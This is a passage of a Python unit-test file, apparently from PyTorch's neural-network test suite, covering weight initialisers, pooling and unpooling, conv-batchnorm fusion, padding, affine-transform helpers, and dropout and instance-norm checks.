input_tensor = self._create_random_nd_tensor(2, size_min=1, size_max=5)
init.eye_(input_tensor)
# Check every single element
for i in range(input_tensor.size(0)):
for j in range(input_tensor.size(1)):
if i == j:
assert input_tensor[i][j] == 1
else:
assert input_tensor[i][j] == 0
def test_eye_only_works_on_2d_inputs(self):
for dims in [1, 3]:
with self.assertRaises(ValueError):
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=3)
init.eye_(tensor)
def test_max_unpool(self):
# Test 1D
output, indices = F.max_pool1d(torch.randn([1, 1, 4]), 2, stride=2, return_indices=True)
self.assertEqual(F.max_unpool1d(output, indices, 2), F.max_unpool1d(output, indices, 2, stride=2))
# Test list / tuple passed as argument to max_unpool1d
input = torch.randn([1, 1, 5])
output, indices = F.max_pool1d(input, 2, stride=2, return_indices=True)
self.assertEqual(F.max_unpool1d(output, indices, 2, stride=2, output_size=input.shape),
F.max_unpool1d(output, indices, 2, stride=2, output_size=input.size()))
# Test 2D
output, indices = F.max_pool2d(torch.randn([1, 1, 4, 4]), 2, stride=2, return_indices=True)
self.assertEqual(F.max_unpool2d(output, indices, 2), F.max_unpool2d(output, indices, 2, stride=2))
# Test 3D
output, indices = F.max_pool3d(torch.randn([4, 4, 4, 4, 4]), 2, stride=2, return_indices=True)
self.assertEqual(F.max_unpool3d(output, indices, 2), F.max_unpool3d(output, indices, 2, stride=2))
def test_dirac_properties(self):
for dims in [3, 4, 5]:
for groups in [1, 2, 3]:
# prepare random tensor with random sizes, but fits groups
a, c, d, e = (random.randint(1, 5) for _ in range(4))
b = random.randint(1, 5 * groups) # same range as a*groups but all range allowed
# make sure first dim divides by groups
input_tensor = torch.randn((a * groups, b, c, d, e)[:dims])
init.dirac_(input_tensor, groups)
c_out, c_in = input_tensor.size(0) // groups, input_tensor.size(1)
min_d = min(c_out, c_in)
# Check number of nonzeros is equivalent to smallest dim (for each group)
assert torch.nonzero(input_tensor).size(0) == min_d * groups
# Check sum of values (can have precision issues, hence assertEqual) is also equivalent
self.assertEqual(input_tensor.sum(), min_d * groups)
def test_dirac_identity(self):
for groups in [1, 3]:
batch, in_c, out_c, size, kernel_size = 8, 3, 9, 5, 3 # in_c, out_c must divide by groups
eff_out_c = out_c // groups
# Test 1D
input_var = torch.randn(batch, in_c, size)
filter_var = torch.zeros(eff_out_c, in_c, kernel_size)
filter_var = torch.cat([filter_var] * groups)
init.dirac_(filter_var, groups)
output_var = F.conv1d(input_var, filter_var)
input_tensor, output_tensor = input_var.data, output_var.data # Variables do not support nonzero
for g in range(groups):
# Assert in_c outputs are preserved (per each group)
self.assertEqual(input_tensor[:, :, 1:-1],
output_tensor[:, eff_out_c * g:eff_out_c * g + in_c, :])
# Assert extra outputs are 0
assert torch.nonzero(output_tensor[:, eff_out_c * g + in_c:eff_out_c * (g + 1), :]).numel() == 0
# Test 2D
input_var = torch.randn(batch, in_c, size, size)
filter_var = torch.zeros(eff_out_c, in_c, kernel_size, kernel_size)
filter_var = torch.cat([filter_var] * groups)
init.dirac_(filter_var, groups)
output_var = F.conv2d(input_var, filter_var)
input_tensor, output_tensor = input_var.data, output_var.data # Variables do not support nonzero
for g in range(groups):
# Assert in_c outputs are preserved (per each group)
self.assertEqual(input_tensor[:, :, 1:-1, 1:-1],
output_tensor[:, eff_out_c * g:eff_out_c * g + in_c, :, :])
# Assert extra outputs are 0
assert torch.nonzero(output_tensor[:, eff_out_c * g + in_c:eff_out_c * (g + 1), :, :]).numel() == 0
# Test 3D
input_var = torch.randn(batch, in_c, size, size, size)
filter_var = torch.zeros(eff_out_c, in_c, kernel_size, kernel_size, kernel_size)
filter_var = torch.cat([filter_var] * groups)
init.dirac_(filter_var, groups)
output_var = F.conv3d(input_var, filter_var)
input_tensor, output_tensor = input_var.data, output_var.data
for g in range(groups):
# Assert in_c outputs are preserved (per each group)
self.assertEqual(input_tensor[:, :, 1:-1, 1:-1, 1:-1],
output_tensor[:, eff_out_c * g:eff_out_c * g + in_c, :, :, :])
# Assert extra outputs are 0
assert torch.nonzero(output_tensor[:, eff_out_c * g + in_c:eff_out_c * (g + 1), :, :, :]).numel() == 0
def test_dirac_only_works_on_3_4_5d_inputs(self):
for dims in [1, 2, 6]:
with self.assertRaises(ValueError):
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=3)
init.dirac_(tensor)
def test_xavier_uniform_errors_on_inputs_smaller_than_2d(self):
for dims in [0, 1]:
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=1)
with self.assertRaises(ValueError):
init.xavier_uniform_(tensor)
def test_xavier_normal_errors_on_inputs_smaller_than_2d(self):
for dims in [0, 1]:
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=1)
with self.assertRaises(ValueError):
init.xavier_normal_(tensor)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_xavier_uniform(self):
for use_gain in [True, False]:
for dims in [2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=20, size_max=25)
gain = 1
if use_gain:
gain = self._random_float(0.1, 2)
init.xavier_uniform_(input_tensor, gain=gain)
else:
init.xavier_uniform_(input_tensor)
fan_in = input_tensor.size(1)
fan_out = input_tensor.size(0)
if input_tensor.dim() > 2:
fan_in *= input_tensor[0, 0].numel()
fan_out *= input_tensor[0, 0].numel()
expected_std = gain * math.sqrt(2.0 / (fan_in + fan_out))
bounds = expected_std * math.sqrt(3)
assert self._is_uniform(input_tensor, -bounds, bounds)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_xavier_normal(self):
for use_gain in [True, False]:
for dims in [2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=20, size_max=25)
gain = 1
if use_gain:
gain = self._random_float(0.1, 2)
init.xavier_normal_(input_tensor, gain=gain)
else:
init.xavier_normal_(input_tensor)
fan_in = input_tensor.size(1)
fan_out = input_tensor.size(0)
if input_tensor.dim() > 2:
fan_in *= input_tensor[0, 0].numel()
fan_out *= input_tensor[0, 0].numel()
expected_std = gain * math.sqrt(2.0 / (fan_in + fan_out))
assert self._is_normal(input_tensor, 0, expected_std)
def test_kaiming_uniform_errors_on_inputs_smaller_than_2d(self):
for dims in [0, 1]:
with self.assertRaises(ValueError):
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=1)
init.kaiming_uniform_(tensor)
def test_kaiming_normal_errors_on_inputs_smaller_than_2d(self):
for dims in [0, 1]:
with self.assertRaises(ValueError):
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=1)
init.kaiming_normal_(tensor)
def test_kaiming_uniform_warning_on_0element_tensor(self):
tensor = torch.empty(0, 1)
with self.assertWarnsRegex(UserWarning, "Initializing zero-element tensors is a no-op"):
_ = init.kaiming_uniform_(tensor)
def test_kaiming_normal_warning_on_0element_tensor(self):
tensor = torch.empty(0, 1)
with self.assertWarnsRegex(UserWarning, "Initializing zero-element tensors is a no-op"):
_ = init.kaiming_normal_(tensor)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_kaiming_uniform(self):
for use_a in [True, False]:
for dims in [2, 4]:
for mode in ['fan_in', 'fan_out']:
input_tensor = self._create_random_nd_tensor(dims, size_min=20, size_max=25)
if use_a:
a = self._random_float(0.1, 2)
init.kaiming_uniform_(input_tensor, a=a, mode=mode)
else:
a = 0
init.kaiming_uniform_(input_tensor, mode=mode)
fan_in = input_tensor.size(1)
fan_out = input_tensor.size(0)
if input_tensor.dim() > 2:
fan_in *= input_tensor[0, 0].numel()
fan_out *= input_tensor[0, 0].numel()
if mode == 'fan_in':
n = fan_in
else:
n = fan_out
expected_std = math.sqrt(2.0 / ((1 + a**2) * n))
bounds = expected_std * math.sqrt(3.0)
assert self._is_uniform(input_tensor, -bounds, bounds)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_kaiming_normal(self):
for use_a in [True, False]:
for dims in [2, 4]:
for mode in ['fan_in', 'fan_out']:
input_tensor = self._create_random_nd_tensor(dims, size_min=20, size_max=25)
if use_a:
a = self._random_float(0.1, 2)
init.kaiming_normal_(input_tensor, a=a, mode=mode)
else:
a = 0
init.kaiming_normal_(input_tensor, mode=mode)
fan_in = input_tensor.size(1)
fan_out = input_tensor.size(0)
if input_tensor.dim() > 2:
fan_in *= input_tensor[0, 0].numel()
fan_out *= input_tensor[0, 0].numel()
if mode == 'fan_in':
n = fan_in
else:
n = fan_out
expected_std = math.sqrt(2.0 / ((1 + a**2) * n))
assert self._is_normal(input_tensor, 0, expected_std)
def test_sparse_only_works_on_2d_inputs(self):
for dims in [1, 3]:
with self.assertRaises(ValueError):
sparsity = self._random_float(0.1, 0.9)
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=3)
init.sparse_(tensor, sparsity)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_sparse_default_std(self):
for use_random_std in [True, False]:
input_tensor = self._create_random_nd_tensor(2, size_min=30, size_max=35)
rows, cols = input_tensor.size(0), input_tensor.size(1)
sparsity = self._random_float(0.1, 0.2)
std = 0.01 # default std
if use_random_std:
std = self._random_float(0.01, 0.2)
init.sparse_(input_tensor, sparsity=sparsity, std=std)
else:
init.sparse_(input_tensor, sparsity=sparsity)
for col_idx in range(input_tensor.size(1)):
column = input_tensor[:, col_idx]
assert column[column == 0].nelement() >= math.ceil(sparsity * rows)
assert self._is_normal(input_tensor[input_tensor != 0], 0, std)
@skipIfNoLapack
def test_orthogonal(self):
for use_gain in [True, False]:
for tensor_size in [[3, 4], [4, 3], [20, 2, 3, 4], [2, 3, 4, 5]]:
input_tensor = torch.zeros(tensor_size)
gain = 1.0
if use_gain:
gain = self._random_float(0.1, 2)
init.orthogonal_(input_tensor, gain=gain)
else:
init.orthogonal_(input_tensor)
rows, cols = tensor_size[0], reduce(mul, tensor_size[1:])
flattened_tensor = input_tensor.view(rows, cols)
if rows > cols:
self.assertEqual(torch.mm(flattened_tensor.t(), flattened_tensor),
torch.eye(cols) * gain ** 2, atol=1e-6, rtol=0)
else:
self.assertEqual(torch.mm(flattened_tensor, flattened_tensor.t()),
torch.eye(rows) * gain ** 2, atol=1e-6, rtol=0)
def test_deprecation(self):
x = torch.randn(3, 3)
def fn():
init.normal(x)
with self.assertWarnsRegex(UserWarning, 'deprecated', msg='methods not suffixed with underscore should be deprecated'):
fn()
class TestFusionEval(TestCase):
@given(X=hu.tensor(shapes=((5, 3, 5, 5),)),
running_mean=hu.tensor(shapes=(6,)),
running_var=hu.tensor(shapes=(6,)))
def test_fuse_module_eval_numerics(self, X, running_mean, running_var):
inputs, _ = X
iC, oC = inputs.shape[1], len(running_mean[0])
inputs = torch.from_numpy(inputs).to(torch.double)
kernel_size = (3, 3)
conv_ref = torch.nn.Conv2d(iC, oC, bias=True, kernel_size=kernel_size)
bn_ref = torch.nn.BatchNorm2d(oC)
bn_ref.running_mean = torch.from_numpy(running_mean[0]).to(torch.double)
bn_ref.running_var = torch.from_numpy(running_var[0]).to(torch.double)
conv_ref.eval()
bn_ref.eval()
Y_ref = bn_ref(conv_ref(inputs))
conv_bn_fused = torch.nn.utils.fusion.fuse_conv_bn_eval(conv_ref,
bn_ref)
Y_hat = conv_bn_fused(inputs)
self.assertEqual(Y_ref, Y_hat, msg="Conv+BN fusion results are off")
na_bn_ref = torch.nn.BatchNorm2d(oC, affine=False)
na_bn_ref.running_mean = torch.from_numpy(running_mean[0]).to(torch.double)
na_bn_ref.running_var = torch.from_numpy(running_var[0]).to(torch.double)
na_bn_ref.eval()
Y_ref = na_bn_ref(conv_ref(inputs))
conv_na_bn_fused = torch.nn.utils.fusion.fuse_conv_bn_eval(conv_ref,
na_bn_ref)
Y_hat = conv_na_bn_fused(inputs)
self.assertEqual(Y_ref, Y_hat, msg="Conv+BN(non-affine) fusion results are off")
class TestConstantPadNd(TestCase):
def test_constant_pad_nd(self):
a = torch.tensor([[1, 2], [3, 4]])
res = torch.constant_pad_nd(a, [1, 2, 1, 0], 9)
expected = torch.tensor([
[9, 9, 9, 9, 9],
[9, 1, 2, 9, 9],
[9, 3, 4, 9, 9]
])
self.assertEqual(res, expected)
def test_preserves_memory_format(self):
nchw_tensor = torch.rand((1, 2, 5, 3))
nchw_padded = torch.constant_pad_nd(nchw_tensor, [1, 2], 0.5)
self.assertTrue(nchw_padded.is_contiguous(memory_format=torch.contiguous_format))
nhwc_tensor = nchw_tensor.contiguous(memory_format=torch.channels_last)
nhwc_padded = torch.constant_pad_nd(nhwc_tensor, [1, 2], 0.5)
self.assertTrue(nhwc_padded.is_contiguous(memory_format=torch.channels_last))
class TestAddRelu(TestCase):
def test_add_relu(self):
a = torch.rand((7, 11))
b = torch.rand((7, 11))
a = a.float()
b = b.float()
a = a * -10
a = a + 5
add_res = a + b
relu_res = torch.relu(add_res)
add_relu_res = torch._VF._add_relu(a, b)
self.assertEqual(add_relu_res, relu_res)
def test_add_relu_broadcasting(self):
a = torch.rand((1, 32))
b = 1
b_scalar = torch.ones(1, 32)
res = torch._VF._add_relu(a, b)
broadcasted_res = torch._VF._add_relu(a, b_scalar)
self.assertEqual(broadcasted_res, res)
def add_test(test, decorator=None):
def add(test_name, fn):
if hasattr(TestNN, test_name):
raise RuntimeError('Found two tests with the same name: ' + test_name)
if decorator is not None:
fn = decorator(fn)
setattr(TestNN, test_name, fn)
test_name = test.get_name()
if not hasattr(test, 'test_cpu') or test.test_cpu:
add(test_name, lambda self, test=test: test(self))
cuda_test_name = test_name + '_cuda'
# With dtype enable, it's good enough to test against three floating types
kwargs = {}
if 'extra_args' in get_function_arglist(test.test_cuda):
kwargs['extra_args'] = test.extra_args
if 'dtype' in get_function_arglist(test.test_cuda):
if tf32_is_not_fp32() and test.with_tf32:
def with_tf32_off(self, test=test, kwargs=kwargs):
with tf32_off():
test.test_cuda(self, dtype=torch.float, **kwargs)
add(cuda_test_name + '_fp32', with_tf32_off)
def with_tf32_on(self, test=test, kwargs=kwargs):
with tf32_on(self, test.tf32_precision):
test.test_cuda(self, dtype=torch.float, **kwargs)
add(cuda_test_name + '_tf32', with_tf32_on)
else:
add(cuda_test_name + '_float', lambda self,
test=test, kwargs=kwargs: test.test_cuda(self, dtype=torch.float, **kwargs))
add(cuda_test_name + '_double', lambda self,
test=test, kwargs=kwargs: test.test_cuda(self, dtype=torch.double, **kwargs))
def test_half(self, test=test, kwargs=kwargs):
test.test_cuda(self, dtype=torch.half, **kwargs)
if getattr(test, 'check_half', True):
add(cuda_test_name + '_half', test_half)
def test_bfloat16(self, test=test, kwargs=kwargs):
test.test_cuda(self, dtype=torch.bfloat16, **kwargs)
if getattr(test, 'check_bfloat16', True):
add(cuda_test_name + '_bfloat16', test_bfloat16)
def test_cfloat(self, test=test, kwargs=kwargs):
test.test_cuda(self, dtype=torch.cfloat, **kwargs)
def test_cdouble(self, test=test, kwargs=kwargs):
test.test_cuda(self, dtype=torch.cdouble, **kwargs)
if getattr(test, 'check_complex', False):
add(cuda_test_name + '_cfloat', test_cfloat)
add(cuda_test_name + '_cdouble', test_cdouble)
else:
def with_tf32_off(self, test=test, kwargs=kwargs):
with tf32_off():
test.test_cuda(self, **kwargs)
if tf32_is_not_fp32() and test.with_tf32:
add(cuda_test_name + '_fp32', with_tf32_off)
def with_tf32_on(self, test=test, kwargs=kwargs):
with tf32_on(self, test.tf32_precision):
test.test_cuda(self, **kwargs)
add(cuda_test_name + '_tf32', with_tf32_on)
else:
add(cuda_test_name, with_tf32_off)
for test_params in module_tests + new_module_tests:
# TODO: CUDA is not implemented yet
if 'constructor' not in test_params:
name = test_params.pop('module_name')
test_params['constructor'] = getattr(nn, name)
decorator = test_params.pop('decorator', None)
test = NewModuleTest(**test_params)
add_test(test, decorator)
if 'check_eval' in test_params:
# create a new test that is identical but that sets module.training to False
desc = test_params.get('desc', None)
test_params['desc'] = 'eval' if desc is None else desc + '_eval'
def gen_eval_constructor(constructor):
def eval_constructor(*args, **kwargs):
cons = constructor(*args, **kwargs)
cons.training = False
return cons
eval_constructor.__name__ = constructor.__name__
return eval_constructor
test_params['constructor'] = gen_eval_constructor(test_params['constructor'])
test = NewModuleTest(**test_params)
add_test(test, decorator)
if 'check_with_long_tensor' in test_params:
fullname = test_params.get('fullname', None)
if fullname:
test_params['fullname'] = fullname + '_with_long_tensor'
else:
desc = test_params.get('desc', None)
test_params['desc'] = 'with_long_tensor' if desc is None else desc + '_with_long_tensor'
def double_equivalent_of_long_tensor(size):
return torch.randint(-1000, 1000, size=size).double()
def apply_to_cons(t):
if t.is_floating_point():
if isinstance(t, Parameter):
return Parameter(double_equivalent_of_long_tensor(t.size()))
elif isinstance(t, torch.Tensor):
return double_equivalent_of_long_tensor(t.size())
else:
return t
def gen_long_tensor_constructor(constructor):
def long_tensor_constructor(*args, **kwargs):
cons = constructor(*args, **kwargs)
cons._apply(apply_to_cons)
return cons
long_tensor_constructor.__name__ = constructor.__name__
return long_tensor_constructor
def gen_long_tensor_input(input_size):
def input_func():
return double_equivalent_of_long_tensor(input_size)
return input_func
def reference_fn(i, p, m):
# For bad reasons this would create LongTensors that requires gradients
# Remove requires_grad to avoid this
for p in m.parameters():
p.requires_grad_(False)
m._apply(lambda t: t.long())
input = i.long()
out = m.forward(input)
return out
test_params['constructor'] = gen_long_tensor_constructor(test_params['constructor'])
test_params['input_fn'] = gen_long_tensor_input(test_params['input_size'])
test_params['reference_fn'] = reference_fn
test_params['check_forward_only'] = True
# Currently we don't support conv2d/conv3d for LongTensor in CUDA
test_params['test_cuda'] = False
test = NewModuleTest(**test_params)
add_test(test, decorator)
for test_params in criterion_tests:
if 'constructor' not in test_params:
name = test_params.pop('module_name')
test_params['constructor'] = getattr(nn, name)
test = CriterionTest(**test_params)
decorator = test_params.pop('decorator', None)
add_test(test, decorator)
if 'check_sum_reduction' in test_params:
desc = test_params.get('desc', None)
test_params['desc'] = 'sum_reduction' if desc is None else desc + '_sum_reduction'
def gen_sum_reduction_constructor(constructor):
def sum_reduction_constructor(*args, **kwargs):
cons = constructor(*args, reduction='sum', **kwargs)
return cons
sum_reduction_constructor.__name__ = constructor.__name__
return sum_reduction_constructor
test_params['constructor'] = gen_sum_reduction_constructor(test_params['constructor'])
test = CriterionTest(**test_params)
add_test(test, decorator)
class UnpoolingNet(nn.Module):
def __init__(self, pool, unpool):
super(UnpoolingNet, self).__init__()
self.pool = pool
self.unpool = unpool
def forward(self, input):
return self.unpool(*self.pool(input))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool1d(2, return_indices=True),
nn.MaxUnpool1d(2)),
input_size=(1, 1, 4),
fullname='MaxUnpool1d_net',))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool2d(2, return_indices=True),
nn.MaxUnpool2d(2)),
input_size=(1, 1, 2, 4),
fullname='MaxUnpool2d_net',))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool3d(2, return_indices=True),
nn.MaxUnpool3d(2)),
input_size=(1, 1, 2, 4, 6),
fullname='MaxUnpool3d_net',
check_gradgrad=False,))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool1d(2, return_indices=True),
nn.MaxUnpool1d(2)),
input_size=(1, 4),
reference_fn=single_batch_reference_fn,
fullname='MaxUnpool1d_net_no_batch_dim',))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool2d(2, return_indices=True),
nn.MaxUnpool2d(2)),
input_size=(1, 2, 4),
reference_fn=single_batch_reference_fn,
fullname='MaxUnpool2d_net_no_batch_dim',))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool3d(2, return_indices=True),
nn.MaxUnpool3d(2)),
input_size=(1, 2, 4, 6),
reference_fn=single_batch_reference_fn,
fullname='MaxUnpool3d_net_no_batch_dim',
check_gradgrad=False))
class _AdaptiveLogSoftmaxWithLoss(nn.AdaptiveLogSoftmaxWithLoss):
def __call__(self, input):
t = torch.tensor([0, 1, 4, 8]).to(input.device)
return nn.AdaptiveLogSoftmaxWithLoss.__call__(self, input, t).output
add_test(NewModuleTest(
constructor=lambda: _AdaptiveLogSoftmaxWithLoss(16, 10, [2, 6]),
input_size=(4, 16),
fullname='AdaptiveLogSoftmax',
with_tf32=True,
tf32_precision=0.005))
# The following are helpers for TestNN.test_affine_*
if torch.cuda.is_available():
def device_():
return ['cpu', 'cuda']
else:
def device_():
return ['cpu']
def angle_rad_():
return [r * math.pi * 2 for r in [0.0, 0.5, 0.25, 0.125, random.random()]]
def axis_vector_():
t = (random.random(), random.random(), random.random())
l = sum(x ** 2 for x in t) ** 0.5
return [(1.0, 0.0, 0.0), (0.0, 1.0, 0.0), (0.0, 0.0, 1.0), tuple(x / l for x in t)]
def input_size2d_():
return [[1, 1, 3, 5], [1, 1, 3, 3], [1, 1, 4, 4], [1, 1, 3, 4]]
def output_size2d_():
return [[1, 1, 5, 3], [1, 1, 3, 5], [1, 1, 4, 3], [1, 1, 5, 5], [1, 1, 6, 6]]
def input_size2dsq_():
return [[1, 1, 2, 2], [1, 1, 3, 3], [1, 1, 4, 4], [1, 1, 6, 6]]
def output_size2dsq_():
return [[1, 1, 2, 2], [1, 1, 3, 3], [1, 1, 4, 4], [1, 1, 5, 5], [1, 1, 6, 6]]
def input_size3d_():
return [[1, 1, 2, 2, 2], [1, 1, 2, 3, 4], [1, 1, 3, 3, 3], [1, 1, 4, 4, 4], [1, 1, 3, 4, 5]]
def input_size3dsq_():
return [[1, 1, 2, 2, 2], [1, 1, 3, 3, 3], [1, 1, 4, 4, 4], [1, 1, 6, 6, 6]]
def output_size3dsq_():
return [[1, 1, 2, 2, 2], [1, 1, 3, 3, 3], [1, 1, 4, 4, 4], [1, 1, 5, 5, 5], [1, 1, 6, 6, 6]]
def output_size3d_():
return [[1, 1, 2, 2, 2], [1, 1, 3, 3, 3], [1, 1, 3, 4, 5], [1, 1, 4, 3, 2], [1, 1, 5, 5, 5], [1, 1, 6, 6, 6]]
def _buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad):
input_center = [(x - 1) / 2.0 for x in input_size]
output_center = [(x - 1) / 2.0 for x in output_size]
s = math.sin(angle_rad)
c = math.cos(angle_rad)
intrans_ary = np.array([
[1, 0, input_center[2]],
[0, 1, input_center[3]],
[0, 0, 1],
], dtype=np.float64)
inscale_ary = np.array([
[input_center[2], 0, 0],
[0, input_center[3], 0],
[0, 0, 1],
], dtype=np.float64)
rotation_ary = np.array([
[c, -s, 0],
[s, c, 0],
[0, 0, 1],
], dtype=np.float64)
outscale_ary = np.array([
[1.0 / output_center[2], 0, 0],
[0, 1.0 / output_center[3], 0],
[0, 0, 1],
], dtype=np.float64)
outtrans_ary = np.array([
[1, 0, -output_center[2]],
[0, 1, -output_center[3]],
[0, 0, 1],
], dtype=np.float64)
reorder_ary = np.array([
[0, 1, 0],
[1, 0, 0],
[0, 0, 1],
], dtype=np.float64)
transform_ary = np.dot(np.dot(np.dot(np.dot(
intrans_ary,
inscale_ary),
rotation_ary.T),
outscale_ary),
outtrans_ary)
grid_ary = np.dot(np.dot(np.dot(reorder_ary, rotation_ary.T), outscale_ary), outtrans_ary)
transform_tensor = torch.from_numpy((rotation_ary)).to(device, torch.float32)
transform_tensor = transform_tensor[:2].unsqueeze(0)
return transform_tensor, transform_ary, grid_ary
def _buildEquivalentAffineTransforms3d(device, input_size, output_size, angle_rad, axis_vector):
input_center = [(x - 1) / 2.0 for x in input_size]
output_center = [(x - 1) / 2.0 for x in output_size]
s = math.sin(angle_rad)
c = math.cos(angle_rad)
c1 = 1 - c
intrans_ary = np.array([
[1, 0, 0, input_center[2]],
[0, 1, 0, input_center[3]],
[0, 0, 1, input_center[4]],
[0, 0, 0, 1],
], dtype=np.float64)
inscale_ary = np.array([
[input_center[2], 0, 0, 0],
[0, input_center[3], 0, 0],
[0, 0, input_center[4], 0],
[0, 0, 0, 1],
], dtype=np.float64)
l, m, n = axis_vector
scipyRotation_ary = np.array([
[l * l * c1 + c, m * l * c1 - n * s, n * l * c1 + m * s, 0],
[l * m * c1 + n * s, m * m * c1 + c, n * m * c1 - l * s, 0],
[l * n * c1 - m * s, m * n * c1 + l * s, n * n * c1 + c, 0],
[0, 0, 0, 1],
], dtype=np.float64)
z, y, x = axis_vector
torchRotation_ary = np.array([
[x * x * c1 + c, y * x * c1 - z * s, z * x * c1 + y * s, 0],
[x * y * c1 + z * s, y * y * c1 + c, z * y * c1 - x * s, 0],
[x * z * c1 - y * s, y * z * c1 + x * s, z * z * c1 + c, 0],
[0, 0, 0, 1],
], dtype=np.float64)
outscale_ary = np.array([
[1.0 / output_center[2], 0, 0, 0],
[0, 1.0 / output_center[3], 0, 0],
[0, 0, 1.0 / output_center[4], 0],
[0, 0, 0, 1],
], dtype=np.float64)
outtrans_ary = np.array([
[1, 0, 0, -output_center[2]],
[0, 1, 0, -output_center[3]],
[0, 0, 1, -output_center[4]],
[0, 0, 0, 1],
], dtype=np.float64)
reorder_ary = np.array([
[0, 0, 1, 0],
[0, 1, 0, 0],
[1, 0, 0, 0],
[0, 0, 0, 1],
], dtype=np.float64)
transform_ary = np.dot(np.dot(np.dot(np.dot(
intrans_ary,
inscale_ary),
np.linalg.inv(scipyRotation_ary)),
outscale_ary),
outtrans_ary)
grid_ary = np.dot(np.dot(np.dot(reorder_ary, np.linalg.inv(scipyRotation_ary)), outscale_ary), outtrans_ary)
transform_tensor = torch.from_numpy((torchRotation_ary)).to(device, torch.float32)
transform_tensor = transform_tensor[:3].unsqueeze(0)
return transform_tensor, transform_ary, grid_ary
# end TestNN.test_affine_* helpers
class TestNNDeviceType(NNTestCase):
def _test_dropout(self, cls, device, input, memory_format=torch.contiguous_format):
p = 0.2
input = input.to(device).fill_(1 - p)
module = cls(p)
input_var = input.clone(memory_format=memory_format).requires_grad_()
output = module(input_var)
self.assertTrue(output.is_contiguous(memory_format=memory_format))
self.assertLess(abs(output.data.mean() - (1 - p)), 0.05)
output.backward(input)
self.assertTrue(input_var.grad.is_contiguous(memory_format=memory_format))
self.assertLess(abs(input_var.grad.data.mean() - (1 - p)), 0.05)
module = cls(p, True)
input_var = input.clone(memory_format=memory_format).requires_grad_()
output = module(input_var + 0)
self.assertTrue(output.is_contiguous(memory_format=memory_format))
self.assertLess(abs(output.data.mean() - (1 - p)), 0.05)
output.backward(input)
self.assertTrue(input_var.grad.is_contiguous(memory_format=memory_format))
self.assertLess(abs(input_var.grad.data.mean() - (1 - p)), 0.05)
# check eval mode doesn't change anything
for inplace in [True, False]:
module = cls(p, inplace).eval()
self.assertEqual(input, module(input))
# Check that these don't raise errors
module.__repr__()
str(module)
def _test_dropout_discontiguous(self, cls, device, memory_format=torch.contiguous_format):
# In this test, we verify that dropout preserves the layout and data for different memory formats.
# We check whether, we get same values for the output of dropout, when the probability
# of dropout is 0 or very close to 0.
# Reference: https://github.com/pytorch/pytorch/issues/47176
close_to_zero_p = 1e-10 # Should be almost zero but not zero, as for p=0 different path is taken
for p in [0, close_to_zero_p]:
inp = torch.ones(2, 3, 3, 3, device=device)
inp_discontiguous = torch.empty(2, 3, 3, 6, device=device, memory_format=memory_format)[..., ::2]
inp_discontiguous.copy_(inp)
mod = cls(p=p)
out = mod(inp_discontiguous)
if p != 0: # Zero will keep strides as is based on input.
# When prob == 0, input stride (54, 18, 6, 2) -> output stride (54, 18, 6, 2)
# When prob != 0, input stride (54, 18, 6, 2) -> output stride (27, 9, 3, 1)
self.assertTrue(out.is_contiguous(memory_format=memory_format))
self.assertEqual(inp_discontiguous, out)
def _test_dropout_stride_mean_preserve(self, cls, device):
def invert_perm(p):
d = {x: i for i, x in enumerate(p)}
return (d[0], d[1], d[2], d[3])
inp = torch.ones(2, 3, 4, 5, device=device)
shifts = [(0, 0), (1, 0), (0, 1), (1, 1)]
for perm in itertools.permutations((0, 1, 2, 3), r=4):
for shift in shifts:
for p in [1e-10, 0.3, 0.5, 0.7]:
mod = cls(p=p)
permuted_inp = inp.permute(perm).contiguous().permute(invert_perm(perm))
permuted_inp = permuted_inp[shift[0]:, shift[1]:, :, :]
out = mod(permuted_inp)
self.assertTrue(out.permute(perm).is_contiguous())
self.assertEqual(inp.mean(), out.mean(), rtol=0.5, atol=0.5)
if p == 1e-10:
self.assertEqual(permuted_inp, out)
else:
self.assertNotEqual(permuted_inp, out)
def _test_InstanceNorm_general(self, cls, input, device, dtype=torch.float):
# default case track_running_stats=False
b, c = input.size(0), input.size(1)
input_var = input.to(device=device, dtype=dtype).requires_grad_()
IN = cls(c, eps=0).to(device, dtype)
output = IN(input_var)
out_reshaped = output.view(b * c, -1)
mean = out_reshaped.mean(1)
var = out_reshaped.var(1, unbiased=False)
self.assertEqual(torch.abs(mean.data).mean(), 0, atol=1e-5, rtol=0)
self.assertEqual(torch.abs(var.data).mean(), 1, atol=1e-5, rtol=0)
# check that eval mode doesn't change behavior
grad_out = torch.randn_like(output)
res1 = output.data.clone()
output.backward(grad_out)
grad1 = input_var.grad.data.clone()
IN.eval()
output = IN(input_var)
input_var.grad = None
output.backward(grad_out)
res2 = output.data
grad2 = input_var.grad.data
self.assertEqual(res1, res2)
self.assertEqual(grad1, grad2)
# If track_running_stats=True and momentum=1, running_mean/var should be
# equal to mean/var of the input (with unbias correction)
IN = cls(c, momentum=1, eps=0, track_running_stats=True).to(device, dtype)
output = IN(input_var)
input_reshaped = input_var.transpose(1, 0).reshape(c, -1)
mean = input_reshaped.mean(1)
input_reshaped = input_var.transpose(1, 0).reshape(c, b, -1)
var = input_reshaped.var(2, unbiased=True)[:, :]
self.assertEqual(torch.abs(mean.data - IN.running_mean).mean(), 0, atol=1e-5, rtol=0)
self.assertEqual(torch.abs(var.data.mean(1) - IN.running_var).mean(), 0, atol=1e-5, rtol=0)
